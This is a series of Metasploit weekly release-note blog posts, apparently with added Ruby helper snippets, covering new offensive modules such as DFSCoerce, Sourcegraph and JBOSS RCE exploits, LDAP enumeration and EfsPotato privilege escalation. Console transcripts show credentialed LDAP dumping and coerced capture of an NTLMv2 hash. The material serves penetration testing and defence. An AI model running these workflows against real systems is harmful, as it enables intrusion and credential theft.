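  edit_distance(name, best) <= max_distance ? best : nil
end

# Emulates `set NAME VALUE`: names are matched case-insensitively and stored
# under their canonical spelling; anything else is rejected with a hint instead
# of being silently stored as a new, unused option.
def set_option(datastore, options, name, value)
  canonical = options.find { |opt| opt.casecmp?(name) }
  if canonical
    datastore[canonical] = value
    return "#{canonical} => #{value}"
  end
  hint = suggest_option(name, options)
  msg = "[-] Unknown datastore option: #{name}."
  msg += " Did you mean #{hint}?" if hint
  msg
end

if __FILE__ == $PROGRAM_NAME
  ds = {}
  puts set_option(ds, PSEXEC_OPTIONS, 'LHSOT', '192.168.159.1')
  puts set_option(ds, PSEXEC_OPTIONS, 'LHOST', '192.168.159.1')
end
```

The distance cap matters: without it every typo, however far off, would be "corrected" to some option, which is exactly the kind of silent surprise the new behaviour is meant to remove.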

New module content (1)

Enhancements and features (6)

  • #16774 from zeroSteiner – The set command has been updated so that if an invalid datastore option is provided, a suggestion will be made for a valid datastore option, where possible. Additionally, the behavior has been changed so that one can no longer set a datastore value that is not valid within the given context.
  • #16798 from bcoles – The deprecated scripts/meterpreter/pml_driver_config.rb script has been removed from Metasploit since Metasploit scripts have been deprecated for over 5 years now. Please use exploit/windows/local/service_permissions instead which contains a more modern implementation of the same principle this exploit utilized.
  • #16801 from bcoles – The deprecated scripts/meterpreter/schelevator.rb script has been removed in favor of exploit/windows/local/ms10_092_schelevator. Scripts were deprecated over 5 years ago and should no longer be used.
  • #16823 from bcoles – The deprecated scripts/meterpreter/prefetchtool.rb has been removed and replaced with the post/windows/gather/enum_prefetch.rb post module.
  • #16830 from bcoles – Remove deprecated scripts/meterpreter/getvncpw.rb script in favor of the post/windows/gather/credentials/vnc post module which is more modern and has more features.
  • #16831 from bcoles – Remove the deprecated scripts/meterpreter/get_env.rb in favor of the post/multi/gather/env post module.

Bugs fixed (6)

  • #16094 from 3V3RYONE – A bug has been fixed in the pg_ctl.rb helper whereby it was possible that initializing and starting databases using msfdb init might fail due to the pg_ctl.rb helper not properly setting unix_socket_directories to a path that a non-root user can write to. This code has now been updated so that it will set the unix_socket_directories setting to a path that the current user can write to or will error out if it cannot find a writeable directory to use for the socket file.
  • #16668 from sempervictus – A bug has been fixed in the HTTP crawler module and its associated library whereby the code expected an object to be populated when it may not be. This has been fixed with additional validation.
  • #16810 from entity0xfe – The host command has been updated to fix a bug whereby the -t flag was not properly accepting the <tag> parameter that it was supposed to accept and process. Additionally, the documentation for this option has been updated to be clearer.
  • #16817 from jmartin-r7 – Several modules and libraries were previously calling Msf::Config.get_config_root which did not properly account for changes to the configuration path that the user might make. These calls have been replaced with calls to Msf::Config.config_directory which will appropriately take the user’s configuration settings into account.
  • #16819 from adfoster-r7 – A bug has been fixed whereby running the hosts command with the -c flag to filter by columns would result in a stack trace. The command now correctly returns the output with only the columns specified to the -c flag.
  • #16824 from bcoles – A bug has been fixed in the is_admin? and is_system? post exploitation methods, which previously incorrectly reported the user as always being an administrator and a system user respectively when run on shell sessions.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/07/22/metasploit-weekly-wrap-up-167/

The past, present and future of Metasploit

Don’t miss Spencer McIntyre’s talk on the Help Net Security blog. Spencer is the Lead Security Researcher at Rapid7 and speaks about how Metasploit has evolved since its creation back in 2003. He also explains how the Framework is addressing today’s offensive security challenges and how important the partnership with the community is.

LDAP swiss army knife

This week, our very own @gwillcox-r7 added an auxiliary module that will likely help you to dump useful information from LDAP servers. This module allows you to remotely retrieve data using either your own custom query or a set of LDAP queries under a specific category. In addition to the available predefined queries, the user can also provide a JSON or YAML file containing custom queries to be executed.

Here are the available predefined queries:

msf6 auxiliary(gather/ldap_query) > show actions

Auxiliary actions:

   Name                      Description
   ----                      -----------
   ENUM_ACCOUNTS             Dump info about all known user accounts in the domain.
   ENUM_ALL_OBJECT_CATEGORY  Dump all objects containing any objectCategory field.
   ENUM_ALL_OBJECT_CLASS     Dump all objects containing any objectClass field.
   ENUM_COMPUTERS            Dump all objects containing an objectCategory of Computer.
   ENUM_DOMAIN_CONTROLLERS   Dump all known domain controllers.
   ENUM_EXCHANGE_RECIPIENTS  Dump info about all known Exchange recipients.
   ENUM_EXCHANGE_SERVERS     Dump info about all known Exchange servers.
   ENUM_GROUPS               Dump info about all known groups in the LDAP environment.
   ENUM_ORGROLES             Dump info about all known organizational roles in the LDAP environment.
   ENUM_ORGUNITS             Dump info about all known organization units in the LDAP environment.
   RUN_QUERY_FILE            Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.
   RUN_SINGLE_QUERY          Execute a single LDAP query using the QUERY_FILTER and QUERY_ATTRIBUTES options.

Here is how you can dump information about users in a Windows domain:

msf6 auxiliary(gather/ldap_query) > set action ENUM_ACCOUNTS
action => ENUM_ACCOUNTS
msf6 auxiliary(gather/ldap_query) > run RHOSTS=10.0.0.33 BIND_DN=MYDOMAIN\\Administrator BIND_PW=123456
[*] Running module against 10.0.0.33

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 10.0.0.33:389 Discovered base DN: DC=mydomain,DC=local
[*] CN=DC02 OU=Domain Controllers DC=mydomain DC=local
===============================================

 Name                Attributes
 ----                ----------
 displayname         DC02$
 name                DC02
 samaccountname      DC02$
 useraccountcontrol  532480

[*] CN=Administrator CN=Users DC=mylab DC=local
===========================================

 Name                Attributes
 ----                ----------
 name                Administrator
 samaccountname      Administrator
 useraccountcontrol  512

 ...[SNIP]...
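
The useraccountcontrol values in that output (532480 for the domain controller, 512 for Administrator) are bit masks, and they are where a defender reading this dump should look first. The following is an added example, not part of the ldap_query module: it parses the attribute tables the module prints, decodes each account's userAccountControl using the documented Active Directory flag values, and marks settings that usually warrant review. The sample output is constructed from the run shown above, and the triage notes are my own labels.

```ruby
# Added example (not from the ldap_query module): decode userAccountControl
# values printed by ENUM_ACCOUNTS and flag settings worth reviewing.

# Documented AD userAccountControl bit flags, in ascending bit order.
UAC_FLAGS = {
  0x0001 => 'SCRIPT',
  0x0002 => 'ACCOUNTDISABLE',
  0x0008 => 'HOMEDIR_REQUIRED',
  0x0010 => 'LOCKOUT',
  0x0020 => 'PASSWD_NOTREQD',
  0x0040 => 'PASSWD_CANT_CHANGE',
  0x0080 => 'ENCRYPTED_TEXT_PWD_ALLOWED',
  0x0100 => 'TEMP_DUPLICATE_ACCOUNT',
  0x0200 => 'NORMAL_ACCOUNT',
  0x0800 => 'INTERDOMAIN_TRUST_ACCOUNT',
  0x1000 => 'WORKSTATION_TRUST_ACCOUNT',
  0x2000 => 'SERVER_TRUST_ACCOUNT',
  0x10000 => 'DONT_EXPIRE_PASSWORD',
  0x20000 => 'MNS_LOGON_ACCOUNT',
  0x40000 => 'SMARTCARD_REQUIRED',
  0x80000 => 'TRUSTED_FOR_DELEGATION',
  0x100000 => 'NOT_DELEGATED',
  0x200000 => 'USE_DES_KEY_ONLY',
  0x400000 => 'DONT_REQ_PREAUTH',
  0x800000 => 'PASSWORD_EXPIRED',
  0x1000000 => 'TRUSTED_TO_AUTH_FOR_DELEGATION',
  0x4000000 => 'PARTIAL_SECRETS_ACCOUNT'
}.freeze

# Flags that weaken an account's security posture; the reasons are constructed
# triage notes, not anything the module itself reports.
RISKY_FLAGS = {
  'PASSWD_NOTREQD' => 'blank password permitted',
  'ENCRYPTED_TEXT_PWD_ALLOWED' => 'reversible password encryption',
  'USE_DES_KEY_ONLY' => 'weak Kerberos key type',
  'TRUSTED_FOR_DELEGATION' => 'unconstrained delegation',
  'TRUSTED_TO_AUTH_FOR_DELEGATION' => 'protocol transition allowed',
  'DONT_REQ_PREAUTH' => 'Kerberos pre-authentication disabled'
}.freeze

# Names of every flag set in the numeric value, in ascending bit order.
def decode_uac(value)
  UAC_FLAGS.select { |bit, _| value & bit != 0 }.values
end

# Pulls (samaccountname, useraccountcontrol) pairs out of the module's tables.
# The samaccountname row precedes useraccountcontrol in each table, as above.
def parse_ldap_output(output)
  accounts = []
  output.each_line do |line|
    if line =~ /^\s*samaccountname\s+(\S+)\s*$/
      accounts << { sam: $1, uac: 0 }
    elsif line =~ /^\s*useraccountcontrol\s+(\d+)\s*$/ && accounts.last
      accounts.last[:uac] = $1.to_i
    end
  end
  accounts
end

# One finding per account: name, decoded flags, and risky flags with reasons.
def triage(output)
  parse_ldap_output(output).map do |acct|
    flags = decode_uac(acct[:uac])
    risks = flags.select { |f| RISKY_FLAGS.key?(f) }.to_h { |f| [f, RISKY_FLAGS[f]] }
    { sam: acct[:sam], flags: flags, risks: risks }
  end
end

# Constructed sample, copied from the module run shown above.
SAMPLE_OUTPUT = <<~OUT
  [*] CN=DC02 OU=Domain Controllers DC=mydomain DC=local
  ===============================================

   Name                Attributes
   ----                ----------
   displayname         DC02$
   name                DC02
   samaccountname      DC02$
   useraccountcontrol  532480

  [*] CN=Administrator CN=Users DC=mylab DC=local
  ===========================================

   Name                Attributes
   ----                ----------
   name                Administrator
   samaccountname      Administrator
   useraccountcontrol  512
OUT

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_OUTPUT).each do |f|
    puts "#{f[:sam]}: #{f[:flags].join(', ')}"
    f[:risks].each { |flag, why| puts "  review #{flag}: #{why}" }
  end
end
```

For DC02$, 532480 decodes to SERVER_TRUST_ACCOUNT plus TRUSTED_FOR_DELEGATION, which is normal for a domain controller; the same flag on a member server or on a user account is the finding to chase. Administrator's 512 is a plain NORMAL_ACCOUNT with nothing else set.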

Win2k summer clean up

For those nostalgic about old Windows systems, bcoles did a great cleanup of old modules targeting Win2k. He breathed life back into modules such as ms01_023_printer, ms02_065_msadc and ms03_007_ntdll_webdav by fixing many issues and adding offsets to support many more Win2k flavors.

New module content (1)

  • LDAP Query and Enumeration Module by Grant Willcox – This adds a generic module to perform LDAP queries. Users can execute custom queries either through configuration files on disk, or through a combination of datastore options. The module also includes multiple builtin queries for common operations.

Enhancements and features (7)

  • #16737 from adfoster-r7 – This removes the code duplication in the MSSQL client mixins and refactors the code into a single main mixin.
  • #16754 from bcoles – Adds additional offsets for various Windows 2000 Professional targets in the ms02_065_msadc module. Also adds documentation and notes.
  • #16761 from bcoles – Adds additional offsets for various Windows 2000 targets, replaces raw socket TCP with HttpClient, fixes default payload, adds docs and notes.
  • #16776 from bcoles – Adds a ftp-http command stager for FTP clients which support http(s) URLs via set cmdstager::flavor ftp_http.
  • #16778 from bcoles – The checkvm script at ./scripts/meterpreter/checkvm.rb has been removed and post/windows/gather/checkvm.rb now replaces it. Additionally, the post/windows/gather/checkvm.rb script has been updated to include missing features from ./scripts/meterpreter/checkvm.rb to ensure backwards compatibility.
  • #16789 from adfoster-r7 – This adds OpenSSL version information to the report generated by the debug command.
  • #16792 from adfoster-r7 – This improves support for various OpenSSL 3 related errors during console start.

Bugs fixed (2)

  • #16743 from adfoster-r7 – Fixes a crash when using the scanner/mssql/mssql_login module with the tdsencryption and USE_WINDOWS_AUTHENT options set to true.
  • #16753 from bcoles – This PR fixes several bugs present in the module, including shifting from Meterpreter to shell payloads, better checking, and added targets and documentation.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/07/15/metasploit-weekly-wrap-up-166/

JBOSS EAP/AS – More Deserializations? Indeed!

Community contributor Heyder Andrade added in a new module for a Java deserialization vulnerability in JBOSS EAP/AS Remoting Unified Invoker interface for versions 6.1.0 and prior. As far as we can tell this was first disclosed by Joao Matos in his paper at AlligatorCon. Later a PoC from Marcio Almeida came out that Heyder Andrade used as the basis for his Metasploit module. The exploit allows an unauthenticated attacker with network access to JBOSS EAP/AS <= 6.1.0 Remoting Unified Invoker interface to gain RCE as the user jboss by sending a crafted serialized object to this interface.

Deserialization attacks have certainly been quite popular as of late but we haven’t seen many in JBOSS lately so we appreciate the efforts of these contributors to provide us with some alternative deserialization attacks 🙂

More Unauthenticated RCEs – Sourcegraph gitserver sshCommand RCE

One unauthenticated RCE is nice for a weekly wrapup, but we can always do better. Why not make it two this week? Courtesy of Spencer McIntyre and Altelus1's PoC, we now have a Metasploit module for CVE-2022-23642, an unauthenticated RCE in Sourcegraph Gitserver prior to 3.37.0 that allows attackers to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. Successful exploitation will allow an unauthenticated attacker to execute commands in the context of the Sourcegraph Gitserver server.

This is another cool attack, as we don’t often see these types of configuration-related issues leading to unauthenticated RCE; typically when they do crop up, there are limitations on what one can do. However in this case we ended up with a full RCE as an unauthenticated user, which goes to show that even less common or more frequently overlooked issues under the right scenario can be exploited to gain privileged access.

Decrypting Ya Secrets – Citrix Netscaler Secrets Decrypter

Finally, community contributor npm-cesium137-io added a new module to decrypt Citrix Netscaler appliance configuration files and recover secrets encrypted with the KEK encryption scheme, provided you have the key fragment files.

We have heard both from npm-cesium137-io and others that Citrix Netscaler has been seen on a number of pen testing engagements so hopefully this module should assist those pen testing these environments by allowing them to more easily obtain secrets during their engagements.

New module content (3)

Enhancements and features (2)

  • #16735 from ErikWynter – This change sets the MeterpreterTryToFork advanced payload option to true by default for the Linux target in the aerohive_netconfig_lfi_log_poison_rce module to prevent the application from hanging once exploited.
  • #16764 from bcoles – Adds two new HTTP client evasion options to msfconsole, HTTP::shuffle_get_params and HTTP::shuffle_post_params, that allow users to randomize the order of the GET and POST parameters to evade static signatures.

Bugs fixed (5)

  • #16617 from NikitaKovaljov – This fixes a race condition that was present in the ipv6_neighbor module that caused hosts to be missed when the scanned range was very short due to an adaptive timeout with an insufficient floor value.
  • #16703 from e2002e – This fixes compatibility issues with the Censys V2 API and the censys_search.rb module.
  • #16718 from cdelafuente-r7 – This fixes the run_as library and module to work correctly on 64-bit systems.
  • #16727 from bcoles – Modules that use the tftp command stager fail due to a missing tftphost option. This ensures that the tftphost host is set and valid before proceeding with creating the command stager.
  • #16736 from ErikWynter – This change fixes a bug in the confluence_widget_connector exploit module to prevent it from crashing when the HTTP response body received in the get_java_property method is empty or does not match expected regex.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/07/08/metasploit-weekly-wrap-up-165/

DFSCoerce – Distributing more than just files

DFS (Distributed File System) is now distributing Net-NTLM credentials thanks to Spencer McIntyre with a new auxiliary/scanner/dcerpc/dfscoerce module that is similar to PetitPotam in how it functions. Note that unlike PetitPotam, this technique does require a normal domain user’s credentials to work.

The following shows the workflow for targeting a 64-bit Windows Server 2019 domain controller. Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine account:

msf6 > use auxiliary/server/capture/smb 
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/smb) > 
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
RHOSTS => 192.168.159.96
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
[*] 192.168.159.96:445    - Binding to \netdfs...
[+] 192.168.159.96:445    - Bound to \netdfs
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.250.237
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/dfscoerce) >

FreeSwitch Brute Force Login

A returning contributor krastanoel has brought us a module for brute forcing the login credential for the FreeSWITCH event socket service.
This is even simpler to use than our usual login scanner modules since there’s no need to determine or brute force a username — only the password is required!

New module content (2)

  • DFSCoerce by Spencer McIntyre, Wh04m1001, and xct_de – This adds a scanner module that implements the dfscoerce technique. Although this technique leverages MS-DFSNM methods, this module works similarly to PetitPotam in that it coerces authentication attempts to other machines over SMB. This ability to coerce authentication attempts makes it particularly useful in NTLM relay attacks.
  • FreeSWITCH Event Socket Login by krastanoel – This adds an auxiliary scanner module that brute forces the FreeSWITCH event socket service login interface to guess the password.

Enhancements and features (1)

  • #16716 from bcoles – This updates HTTP Command stagers to expose the CMDSTAGER::URIPATH option, so users can choose where to host the payload when using a command stager.

Bugs fixed (3)

  • #16704 from gwillcox-r7 – This fixes an issue when targeting some faulty memcached servers that return an error when extracting the keys and values stored in slabs. The module no longer errors out with a type conversion error.
  • #16724 from bcoles – This updates and fixes the exploit/windows/iis/ms01_026_dbldecode module. It now uses the standard HttpClient, the TFTP stager has been fixed, and Meterpreter specific code has been removed since Meterpreter is not available on Server 2000 systems since Metasploit v6.
  • #16731 from space-r7 – Fixes a logic bug in the process API that would cause additional permissions to be requested than what was intended.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/07/01/metasploit-weekly-wrap-up-164/

SAMR Auxiliary Module

A new SAMR auxiliary module has been added that allows users to add, lookup, and delete computer accounts from an AD domain. This should be useful for pentesters on engagements who need to create an AD account to gain an initial foothold into the domain for lateral movement attacks, or who need to use this functionality as an attack primitive.

Note when using this module that there is a standard number of computers a user can add, so be wary that you may get STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED error messages if you try to run this repeatedly. It should also be noted that whilst a standard user can create a computer account, you will need additional privileges to delete that account.

A Pesky Table Bug Gets Squashed

A well known bug in Rex-Tables when trying to render tables which contain unsupported characters has now been fixed in Rex-Text 0.2.38, which has now been pulled into the framework. This should solve a number of issues that have been reported over the last year such as https://github.com/rapid7/metasploit-framework/issues/15833, https://github.com/rapid7/metasploit-framework/issues/14955, and https://github.com/rapid7/metasploit-framework/issues/15044. It should also help improve experiences with some of the new LDAP work we have been working on lately, so that users should have a smoother experience once that releases.

PHP Mailer Argument Injection Module Improvements

As a final point of note, community contributor erikbomb has improved the PHP Mailer Argument Injection exploit targeting CVE-2016-10033 and CVE-2016-10045 to now support changing the name of the fields for the name, email, and message objects. This should allow this exploit to work under additional scenarios where these settings may need to be altered for the exploit to successfully run. Much thanks to erikbomb for these enhancements!

New module content (1)

  • SAMR Computer Management by JaGoTu and Spencer McIntyre – This adds an auxiliary module that can be used to add, lookup, and delete computer accounts from an active directory domain. The computer account can offer a sort of foothold into the domain for lateral movements or as a common attack primitive.

Enhancements and features (1)

  • #16721 from erikbomb – This updates the PHP Mailer Argument Injection exploit to allow setting the names of certain fields via advanced options. These configuration options then allow the exploit to work in additional scenarios.

Bugs fixed (2)

  • #16722 from bcoles – Fixes module metadata for stability and reliability.
  • #16729 from gwillcox-r7 – Fixes a crash in Metasploit’s console when trying to render tables which contain unsupported characters.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Erran Carey original https://blog.rapid7.com/2022/06/24/metasploit-weekly-wrap-up-163/

Add Windows target support for the Confluence OGNL injection module

This improves the exploit/multi/http/atlassian_confluence_namespace_ognl_injection module to support Windows server targets.

EfsPotato – 6th getsystem technique

This adds the EfsPotato technique to the getsystem command in meterpreter. The new technique leverages the EFSRPC API to elevate a user if they have SeImpersonatePrivilege permissions enabled.

New module content (1)

  • #16676 from cdelafuente-r7 – Adds a new getsystem technique that leverages the EFSRPC API to elevate a user with the SeImpersonatePrivilege permission to NT AUTHORITY\SYSTEM. This technique is often referred to as "EfsPotato". It also improves the post module to use ACTIONS instead of the datastore TECHNIQUE for a simpler user interface when using info or show actions for this module, allowing a user to determine which techniques were available from inside msfconsole.

Enhancements and features (2)

  • #16650 from red0xff – This PR implements the method #read_from_file for PostgreSQL and MSSQL, and fixes the MySQL implementation. It also updates the test module to better handle multiline data returned from SQL queries.
  • #16692 from noraj – Updates various links to https://docs.metasploit.com

Bugs fixed (2)

  • #16597 from zeroSteiner – This fixes an issue with the encrypted shell payload stage that prevented it from being used with the new Powershell command adapter. In addition to this, a number of payload modules have been updated to include an opts hash as a parameter for compatibility.
  • #16680 from zeroSteiner – This PR adds support for Windows targets to the atlassian_confluence_namespace_ognl_injection module and fixes an issue where the check method would fail to properly identify that Windows targets were even vulnerable due to how the command was being executed.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/06/17/metasploit-weekly-wrap-up-162/

vCenter Secret Extracter

Expanding on the work of the vcenter_forge_saml_token auxiliary module, community contributor npm-cesium137-io has added a new module for extracting the vmdir/vmafd certificates, the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated, from an offline copy of the services database. This information can then be used with the vcenter_forge_saml_token module to gain a session cookie that grants access to the SSO domain as a vSphere administrator.

Great work by npm-cesium137-io to complete this exploit chain and provide users a full end to end solution to get administrative level privileges on a vCenter/vSphere server given an offline copy of the services database!

Named Pipe Pivoting Documentation Updates

Historically speaking named pipe pivoting has been an area of much confusion among users. We have taken note of this and thanks to some help from adfoster-r7 and bwatters-r7, we have added in some documentation for using named pipe pivoting with Windows Meterpreter.

You can find this documentation online on our documentation site at https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html. Note that since with Metasploit 6.2 our documentation now lives inside of the Metasploit codebase, which you can find at docs/metasploit-framework.wiki/Pivoting-In-Metasploit.md.

Service Library Improvements

Community contributor kalidor noticed, whilst testing a few modules, that the Windows Services library we maintain was in need of some updates and was erroring out for him in a number of cases. This turned out to be due to some inappropriately thrown exceptions. After further consultation it was decided that a rewrite of the code was needed, which not only solved the original issue but also brought the Windows Services library more closely in line with existing design patterns, ensuring it will be easier to maintain long term.

New module content (1)

  • VMware vCenter Extract Secrets from vmdir / vmafd DB File by npm – This module extracts the vmdir / vmafd certificates from an offline copy of the service database (i.e. a vCenter backup). Right now it will pull the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated.

Enhancements and features (1)

  • #16654 from adfoster-r7 – This PR adds documentation for using named pipe pivoting with Windows Meterpreter.

Bugs fixed (3)

  • #16602 from kalidor – If a user restarted a service using lib/msf/core/post/windows/services.rb, an exception would be thrown as an integer instead of as a string, which would cause an error to occur. This has been fixed by rewriting the code for service_restart to use more appropriate logic. Additionally, the documentation for lib/msf/core/post/windows/services.rb has been updated to note which functions may throw exceptions.
  • #16627 from bwatters-r7 – The tools/modules/update_payload_cached_sizes.rb script has been updated to contain additional exception handling to appropriately handle any exceptions that may be thrown during runs, and then print out a list of those exceptions at the end of the run.
  • #16665 from adfoster-r7 – A missing import has been fixed in /tools/exploit/random_compile_c.rb, allowing it to now compile C files as expected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).